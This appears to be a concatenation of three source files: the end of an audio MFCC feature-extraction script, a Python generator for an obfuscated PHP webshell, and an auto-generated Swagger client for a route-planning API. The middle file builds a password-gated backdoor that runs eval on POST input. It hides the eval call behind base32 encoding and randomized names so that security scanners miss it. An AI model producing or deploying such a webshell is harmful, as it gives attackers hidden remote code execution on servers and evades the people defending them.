mfcc_bands, mfcc_coeffs = mfcc(spectrum(w(frame)))
mfccs.append(mfcc_coeffs)
composer = 'vivaldi'
f.write('%r' %np.mean(mfccs[0]))
f.write(',')
f.write('%r' %np.mean(mfccs[1]))
f.write(',')
f.write('%r' %np.mean(mfccs[2]))
f.write(',')
f.write('%r' %np.mean(mfccs[3]))
f.write(',')
f.write('%r' %np.mean(mfccs[4]))
f.write(',')
f.write('%r' %np.mean(mfccs[5]))
f.write(',')
f.write('%r' %np.mean(mfccs[6]))
f.write(',')
f.write('%r' %np.mean(mfccs[7]))
f.write(',')
f.write('%r' %np.mean(mfccs[8]))
f.write(',')
f.write('%r' %np.mean(mfccs[9]))
f.write(',')
f.write('%r' %np.mean(mfccs[10]))
f.write(',')
f.write('%r' %np.mean(mfccs[11]))
f.write(',')
f.write('%r' %np.mean(mfccs[12]))
f.write(',')
f.write('%r' %np.mean(flat))
f.write(',')
f.write('%r' %np.var(flat))
f.write(',')
f.write('%r' %np.mean(rol))
f.write(',')
f.write('%r' %np.var(rol))
f.write(',')
f.write('%r' %np.mean(cen))
f.write(',')
f.write('%r' %np.var(cen))
f.write(',')
f.write('%r' %np.mean(flu))
f.write(',')
f.write('%r' %np.var(flu))
f.write(',')
f.write('%r' %np.mean(ene))
f.write(',')
f.write('%r' %np.var(ene))
f.write(',')
f.write('%r' %np.mean(zer))
f.write(',')
f.write('%r' %np.var(zer))
f.write(',')
f.write('%r' %np.std(flat))
f.write(',')
f.write('%r' %stats.hmean(flat))
f.write(',')
f.write('%s' %composer)
f.write('\n')
f.write('%\n')
f.write('%\n')
f.write('%\n')
f.close()
| gpl-3.0 | 1,453,385,441,385,459,500 | 22.379043 | 155 | 0.597001 | false |
tennc/webshell | php/create_webshell_with_py.py | 1 | 2291 | import random
#author: pureqh
#github: https://github.com/pureqh/webshell
#use:GET:http://url?pass=pureqh POST:zero
shell = '''<?php
class {0}{1}
public ${2} = null;
public ${3} = null;
function __construct(){1}
if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){1}
$this->{2} = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
$this->{3} = @{9}($this->{2});
@eval({5}.$this->{3}.{5});
{4}{4}{4}
new {0}();
function {6}(${7}){1}
$BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
${8} = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
$v <<= 8;
$v += ord(${7}[$i]);
$vbits += 8;
while ($vbits >= 5) {1}
$vbits -= 5;
${8} .= $BASE32_ALPHABET[$v >> $vbits];
$v &= ((1 << $vbits) - 1);{4}{4}
if ($vbits > 0){1}
$v <<= (5 - $vbits);
${8} .= $BASE32_ALPHABET[$v];{4}
return ${8};{4}
function {9}(${7}){1}
${8} = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
$v <<= 5;
if (${7}[$i] >= 'a' && ${7}[$i] <= 'z'){1}
$v += (ord(${7}[$i]) - 97);
{4} elseif (${7}[$i] >= '2' && ${7}[$i] <= '7') {1}
$v += (24 + ${7}[$i]);
{4} else {1}
exit(1);
{4}
$vbits += 5;
while ($vbits >= 8){1}
$vbits -= 8;
${8} .= chr($v >> $vbits);
$v &= ((1 << $vbits) - 1);{4}{4}
return ${8};{4}
?>'''
def random_keys(len):
str = '`~-=!@#$%^&_+?<>|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str,len))
def random_name(len):
str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str,len))
def build_webshell():
className = random_name(4)
lef = '''{'''
parameter1 = random_name(4)
parameter2 = random_name(4)
rig = '''}'''
disrupt = "\"/*"+random_keys(7)+"*/\""
fun1 = random_name(4)
fun1_vul = random_name(4)
fun1_ret = random_name(4)
fun2 = random_name(4)
shellc = shell.format(className,lef,parameter1,parameter2,rig,disrupt,fun1,fun1_vul,fun1_ret,fun2)
return shellc
if __name__ == '__main__':
print (build_webshell())
| gpl-3.0 | -521,559,099,805,396,200 | 27.283951 | 102 | 0.454387 | false |
Mapotempo/mapotempo-qgis-plugin | SwaggerMapo/apis/plannings_api.py | 1 | 44443 | #!/usr/bin/env python
# coding: utf-8
"""
PlanningsApi.py
Copyright 2015 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually.
"""
from __future__ import absolute_import
import sys
import os
# python 2 and python 3 compatibility library
from six import iteritems
from .. import configuration
from ..api_client import ApiClient
class PlanningsApi(object):
def __init__(self, api_client=None):
if api_client:
self.api_client = api_client
else:
if not configuration.api_client:
configuration.api_client = ApiClient('http://beta.app.mapotempo.com/api')
self.api_client = configuration.api_client
def get_plannings(self, **kwargs):
"""
Fetch customer's plannings.
:return: list[V01Planning]
"""
all_params = []
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method get_plannings" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings.{format}'.replace('{format}', 'json')
method = 'GET'
path_params = {}
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='list[V01Planning]', auth_settings=auth_settings)
return response
def create_planning(self, name, **kwargs):
"""
Create planning.
:param str name: (required)
:param str ref:
:param str date:
:param int zoning_id:
:param bool out_of_date:
:param list[int] route_ids:
:param list[int] tag_ids:
:return: V01Planning
"""
# verify the required parameter 'name' is set
if name is None:
raise ValueError("Missing the required parameter `name` when calling `create_planning`")
all_params = ['name', 'ref', 'date', 'zoning_id', 'out_of_date', 'route_ids', 'tag_ids']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method create_planning" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings.{format}'.replace('{format}', 'json')
method = 'POST'
path_params = {}
query_params = {}
header_params = {}
form_params = {}
files = {}
if 'name' in params:
form_params['name'] = params['name']
if 'ref' in params:
form_params['ref'] = params['ref']
if 'date' in params:
form_params['date'] = params['date']
if 'zoning_id' in params:
form_params['zoning_id'] = params['zoning_id']
if 'out_of_date' in params:
form_params['out_of_date'] = params['out_of_date']
if 'route_ids' in params:
form_params['route_ids'] = params['route_ids']
if 'tag_ids' in params:
form_params['tag_ids'] = params['tag_ids']
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Planning', auth_settings=auth_settings)
return response
def delete_plannings(self, ids, **kwargs):
"""
Delete multiple plannings.
:param list[Integer] ids: (required)
:return: str
"""
# verify the required parameter 'ids' is set
if ids is None:
raise ValueError("Missing the required parameter `ids` when calling `delete_plannings`")
all_params = ['ids']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method delete_plannings" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings.{format}'.replace('{format}', 'json')
method = 'DELETE'
path_params = {}
query_params = {}
if 'ids' in params:
query_params['ids'] = params['ids']
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
def get_planning(self, id, **kwargs):
"""
Fetch planning.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:return: V01Planning
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `get_planning`")
all_params = ['id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method get_planning" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}.{format}'.replace('{format}', 'json')
method = 'GET'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Planning', auth_settings=auth_settings)
return response
def update_planning(self, id, **kwargs):
"""
Update planning.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:param str name:
:param str ref:
:param str date:
:param int zoning_id:
:param bool out_of_date:
:param list[int] route_ids:
:param list[int] tag_ids:
:return: V01Planning
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `update_planning`")
all_params = ['id', 'name', 'ref', 'date', 'zoning_id', 'out_of_date', 'route_ids', 'tag_ids']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method update_planning" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}.{format}'.replace('{format}', 'json')
method = 'PUT'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
if 'name' in params:
form_params['name'] = params['name']
if 'ref' in params:
form_params['ref'] = params['ref']
if 'date' in params:
form_params['date'] = params['date']
if 'zoning_id' in params:
form_params['zoning_id'] = params['zoning_id']
if 'out_of_date' in params:
form_params['out_of_date'] = params['out_of_date']
if 'route_ids' in params:
form_params['route_ids'] = params['route_ids']
if 'tag_ids' in params:
form_params['tag_ids'] = params['tag_ids']
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(['application/x-www-form-urlencoded'])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Planning', auth_settings=auth_settings)
return response
def delete_planning(self, id, **kwargs):
"""
Delete planning.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:return: str
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `delete_planning`")
all_params = ['id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method delete_planning" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}.{format}'.replace('{format}', 'json')
method = 'DELETE'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
def automatic_insert_stop(self, id, **kwargs):
"""
Suggest a place for an unaffected stop.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:return: str
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `automatic_insert_stop`")
all_params = ['id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method automatic_insert_stop" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}/automatic_insert.{format}'.replace('{format}', 'json')
method = 'PATCH'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
def clone_planning(self, id, **kwargs):
"""
Clone the planning.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:return: V01Planning
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `clone_planning`")
all_params = ['id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method clone_planning" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}/duplicate.{format}'.replace('{format}', 'json')
method = 'PATCH'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Planning', auth_settings=auth_settings)
return response
def optimize_routes(self, id, **kwargs):
"""
Starts asynchronous routes optimization.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:return: str
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `optimize_routes`")
all_params = ['id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method optimize_routes" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}/optimize_each_routes.{format}'.replace('{format}', 'json')
method = 'GET'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
def use_order_array(self, id, order_array_id, shift, **kwargs):
"""
Use order_array in the planning.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:param str order_array_id: (required)
:param int shift: (required)
:return: V01Planning
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `use_order_array`")
# verify the required parameter 'order_array_id' is set
if order_array_id is None:
raise ValueError("Missing the required parameter `order_array_id` when calling `use_order_array`")
# verify the required parameter 'shift' is set
if shift is None:
raise ValueError("Missing the required parameter `shift` when calling `use_order_array`")
all_params = ['id', 'order_array_id', 'shift']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method use_order_array" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}/orders/{order_array_id}/{shift}.{format}'.replace('{format}', 'json')
method = 'PATCH'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'order_array_id' in params:
path_params['order_array_id'] = params['order_array_id']
if 'shift' in params:
path_params['shift'] = params['shift']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Planning', auth_settings=auth_settings)
return response
def refresh_planning(self, id, **kwargs):
"""
Force recompute the planning after parameter update.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:return: V01Planning
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `refresh_planning`")
all_params = ['id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method refresh_planning" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}/refresh.{format}'.replace('{format}', 'json')
method = 'GET'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Planning', auth_settings=auth_settings)
return response
def switch_vehicles(self, id, **kwargs):
"""
Switch two vehicles.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:return: str
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `switch_vehicles`")
all_params = ['id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method switch_vehicles" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}/switch.{format}'.replace('{format}', 'json')
method = 'PATCH'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
def update_stop(self, planning_id, route_id, id, **kwargs):
"""
Update stop.
:param int planning_id: (required)
:param int route_id: (required)
:param int id: (required)
:param bool active:
:return: str
"""
# verify the required parameter 'planning_id' is set
if planning_id is None:
raise ValueError("Missing the required parameter `planning_id` when calling `update_stop`")
# verify the required parameter 'route_id' is set
if route_id is None:
raise ValueError("Missing the required parameter `route_id` when calling `update_stop`")
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `update_stop`")
all_params = ['planning_id', 'route_id', 'id', 'active']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method update_stop" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{planning_id}/routes/{route_id}/stops/{id}.{format}'.replace('{format}', 'json')
method = 'PUT'
path_params = {}
if 'planning_id' in params:
path_params['planning_id'] = params['planning_id']
if 'route_id' in params:
path_params['route_id'] = params['route_id']
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
if 'active' in params:
form_params['active'] = bytes(params['active'])
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(['application/x-www-form-urlencoded'])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
def get_routes(self, planning_id, **kwargs):
"""
Fetch planning's routes.
:param str planning_id: Id or the ref field value, then use \"ref:[value]\". (required)
:return: list[V01Route]
"""
# verify the required parameter 'planning_id' is set
if planning_id is None:
raise ValueError("Missing the required parameter `planning_id` when calling `get_routes`")
all_params = ['planning_id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method get_routes" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{planning_id}/routes.{format}'.replace('{format}', 'json')
method = 'GET'
path_params = {}
if 'planning_id' in params:
path_params['planning_id'] = params['planning_id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='list[V01Route]', auth_settings=auth_settings)
return response
def get_route(self, planning_id, id, **kwargs):
"""
Fetch route.
:param str planning_id: Id or the ref field value, then use \"ref:[value]\". (required)
:param int id: (required)
:return: V01Route
"""
# verify the required parameter 'planning_id' is set
if planning_id is None:
raise ValueError("Missing the required parameter `planning_id` when calling `get_route`")
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `get_route`")
all_params = ['planning_id', 'id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method get_route" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{planning_id}/routes/{id}.{format}'.replace('{format}', 'json')
method = 'GET'
path_params = {}
if 'planning_id' in params:
path_params['planning_id'] = params['planning_id']
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Route', auth_settings=auth_settings)
return response
def update_route(self, planning_id, id, **kwargs):
"""
Update route.
:param str planning_id: Id or the ref field value, then use \"ref:[value]\". (required)
:param int id: (required)
:param bool hidden:
:param bool locked:
:param str color:
:return: V01Route
"""
# verify the required parameter 'planning_id' is set
if planning_id is None:
raise ValueError("Missing the required parameter `planning_id` when calling `update_route`")
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `update_route`")
all_params = ['planning_id', 'id', 'hidden', 'locked', 'color']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method update_route" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{planning_id}/routes/{id}.{format}'.replace('{format}', 'json')
method = 'PUT'
path_params = {}
if 'planning_id' in params:
path_params['planning_id'] = params['planning_id']
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
if 'hidden' in params:
form_params['hidden'] = params['hidden']
if 'locked' in params:
form_params['locked'] = params['locked']
if 'color' in params:
form_params['color'] = params['color']
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(['application/x-www-form-urlencoded'])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Route', auth_settings=auth_settings)
return response
def activation_stops(self, planning_id, id, active, **kwargs):
"""
Change stops activation.
:param str planning_id: Id or the ref field value, then use \"ref:[value]\". (required)
:param int id: (required)
:param str active: (required)
:return: V01Route
"""
# verify the required parameter 'planning_id' is set
if planning_id is None:
raise ValueError("Missing the required parameter `planning_id` when calling `activation_stops`")
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `activation_stops`")
# verify the required parameter 'active' is set
if active is None:
raise ValueError("Missing the required parameter `active` when calling `activation_stops`")
all_params = ['planning_id', 'id', 'active']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method activation_stops" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{planning_id}/routes/{id}/active/{active}.{format}'.replace('{format}', 'json')
method = 'PATCH'
path_params = {}
if 'planning_id' in params:
path_params['planning_id'] = params['planning_id']
if 'id' in params:
path_params['id'] = params['id']
if 'active' in params:
path_params['active'] = params['active']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Route', auth_settings=auth_settings)
return response
def move_destinations(self, planning_id, id, destination_ids, **kwargs):
"""
Move destination to routes. Append in order at end.
:param str planning_id: Id or the ref field value, then use \"ref:[value]\". (required)
:param str id: (required)
:param list[Integer] destination_ids: (required)
:return: str
"""
# verify the required parameter 'planning_id' is set
if planning_id is None:
raise ValueError("Missing the required parameter `planning_id` when calling `move_destinations`")
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `move_destinations`")
# verify the required parameter 'destination_ids' is set
if destination_ids is None:
raise ValueError("Missing the required parameter `destination_ids` when calling `move_destinations`")
all_params = ['planning_id', 'id', 'destination_ids']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method move_destinations" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{planning_id}/routes/{id}/destinations/moves.{format}'.replace('{format}', 'json')
method = 'PATCH'
path_params = {}
if 'planning_id' in params:
path_params['planning_id'] = params['planning_id']
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
if 'destination_ids' in params:
form_params['destination_ids'] = bytes(params['destination_ids'])
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(['multipart/form-data'])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
def optimize_route(self, planning_id, id, **kwargs):
"""
Starts asynchronous route optimization.
:param str planning_id: Id or the ref field value, then use \"ref:[value]\". (required)
:param int id: (required)
:return: str
"""
# verify the required parameter 'planning_id' is set
if planning_id is None:
raise ValueError("Missing the required parameter `planning_id` when calling `optimize_route`")
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `optimize_route`")
all_params = ['planning_id', 'id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method optimize_route" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{planning_id}/routes/{id}/optimize.{format}'.replace('{format}', 'json')
method = 'PATCH'
path_params = {}
if 'planning_id' in params:
path_params['planning_id'] = params['planning_id']
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
if 'planning_id' in params:
form_params['planning_id'] = params['planning_id']
if 'id' in params:
form_params['id'] = params['id']
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(['application/x-www-form-urlencoded'])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
def move_stop(self, planning_id, id, stop_id, index, **kwargs):
"""
Move stop position in routes.
:param str planning_id: Id or the ref field value, then use \"ref:[value]\". (required)
:param str id: (required)
:param int stop_id: Stop id to move (required)
:param int index: New position in the route (required)
:return: str
"""
# verify the required parameter 'planning_id' is set
if planning_id is None:
raise ValueError("Missing the required parameter `planning_id` when calling `move_stop`")
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `move_stop`")
# verify the required parameter 'stop_id' is set
if stop_id is None:
raise ValueError("Missing the required parameter `stop_id` when calling `move_stop`")
# verify the required parameter 'index' is set
if index is None:
raise ValueError("Missing the required parameter `index` when calling `move_stop`")
all_params = ['planning_id', 'id', 'stop_id', 'index']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method move_stop" % key)
params[key] = val
del params['kwargs']
